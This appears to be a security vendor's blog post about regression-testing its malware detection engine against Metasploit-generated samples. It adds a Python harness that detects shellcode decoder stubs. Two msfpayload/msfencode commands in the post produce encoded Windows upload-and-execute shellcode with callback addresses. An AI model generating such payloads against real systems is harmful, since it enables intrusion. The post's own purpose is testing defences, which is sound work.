Malware detection testing | Quttera blog

Metasploit is one of the best tools available for penetration testing and for generating exploits with payloads. It is an excellent framework for running field tests and quality checks of anti-malware software capabilities, in both manual and automated modes. For our core technology, the malicious content detection engine, it is critical that each of the engine modules (especially the heuristic and behavior-based components) work together correctly while investigating and weighing the bits of code. Such a sophisticated, self-learning engine requires regular testing on a variety of samples to ensure that both performance and regression aspects are covered. In addition to the millions of URLs scanned for malware through our free public Online Website Malware Scanner, the engine continuously undergoes harness and functional tests on arbitrarily generated new malware samples of various kinds. This post is a small glance at specific (legacy) regression test cases picked from the quality assurance process we employ at Quttera labs.

Investigation report for windows/upexec/find_tag shellcode encoded by x86/shikata_ga_nai encoder

Payload generation command:

msfpayload windows/upexec/find_tag LHOST=192.168.111.129 LPORT=9988 PEXEC=./ R | msfencode -e x86/shikata_ga_nai -t raw

Offset of the detected payload: 0

Payload emulation counters: (screenshot; image not reproduced here)

Detection disassembly: Part 1, Part 2, Part 3 (screenshots; images not reproduced here)

Investigation report for windows/upexec/reverse_http encoded by x86/jmp_call_additive

Shellcode generation command:

msfpayload windows/upexec/reverse_http PEXEC=./ LHOST=127.0.0.1 LPORT=31337 R | msfencode -e x86/jmp_call_additive -t raw

Offset of the detected payload: 0

Payload emulation counters: (screenshot; image not reproduced here)

Detection disassembly: Part 1, Part 2 (screenshots; images not reproduced here)

Investigation report for the CoolPlayer+ Portable 2.19.2 exploit

Payload source:

hxxp://1337day.com/exploits/19116

Offset of the detected payload: 0

Payload emulation counters: (screenshot; image not reproduced here)

Detection disassembly: Part 1, Part 2 (screenshots; images not reproduced here)
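As an added example (not Quttera's code or engine), here is a small regression harness of the kind the introduction describes: each case pairs a sample with the detection offset it is expected to produce, like the reports above, and any mismatch is reported as a regression. The stub heuristics (simple GetPC byte shapes) and the hand-written sample bytes are assumptions made for illustration, not real msfencode output.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Simplified "GetPC" stub heuristics (an assumption for this example, not
# Quttera's engine). Position-independent decoder loops must first find their
# own address before they can decode the payload that follows them:
#  - fnstenv [esp-0xc] ; ... ; pop reg   (shape used by x86/shikata_ga_nai)
#  - call $+5 ; pop reg                  (classic call/pop GetPC)
#  - jmp short ; pop reg                 (jmp/call/pop shape, e.g. jmp_call_additive)
GETPC_PATTERNS = [
    ("fnstenv/pop", re.compile(rb"\xd9\x74\x24\xf4.{0,4}?[\x58-\x5f]", re.DOTALL)),
    ("call+5/pop", re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]", re.DOTALL)),
    ("jmp/pop", re.compile(rb"\xeb.[\x58-\x5f]", re.DOTALL)),
]

def find_decoder_stub(data: bytes) -> Optional[Tuple[int, str]]:
    """Return (offset, pattern name) of the earliest stub found, else None."""
    best = None
    for name, pat in GETPC_PATTERNS:
        m = pat.search(data)
        if m and (best is None or m.start() < best[0]):
            best = (m.start(), name)
    return best

@dataclass
class Case:
    name: str
    sample: bytes
    expected_offset: Optional[int]  # None means the sample is expected clean

# Constructed samples (hand-written stub bytes plus filler), laid out like the
# reports above: name, bytes, expected offset of the detected payload.
CASES = [
    Case("fnstenv stub at 0", b"\xd9\x74\x24\xf4\x5b" + b"\x41" * 24, 0),
    Case("jmp/pop stub at 0", b"\xeb\x0c\x5e" + b"\x90" * 12 + b"\xe8\xef\xff\xff\xff", 0),
    Case("call/pop stub after 16 filler bytes",
         b"\x90" * 16 + b"\xe8\x00\x00\x00\x00\x5e" + b"\x41" * 8, 16),
    Case("plain text, expected clean", b"GET /index.html HTTP/1.1\r\n", None),
]

def run_regression(cases: List[Case]) -> List[Tuple[str, Optional[int], Optional[int]]]:
    """Run every case; return (name, expected, actual) for each mismatch."""
    failures = []
    for case in cases:
        hit = find_decoder_stub(case.sample)
        actual = hit[0] if hit else None
        if actual != case.expected_offset:
            failures.append((case.name, case.expected_offset, actual))
    return failures

if __name__ == "__main__":
    for name, expected, actual in run_regression(CASES):
        print(f"REGRESSION: {name}: expected {expected}, got {actual}")
```

In a real harness the sample bytes would come from freshly generated encoder output and the expected offsets from a reviewed baseline, so that a change in the engine that shifts or loses a detection shows up as a failing case.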

Our technology provides in-depth visibility into the code and the intent of the identified suspicious components. It combines sophisticated classification and mathematical algorithms to detect cyber threats without the need for signatures, in order to keep up with constantly evolving malware. Contact us to schedule a demo or to find out how Quttera technology can help you protect your website and any other digital assets. Find out more about our products and services: https://quttera.com/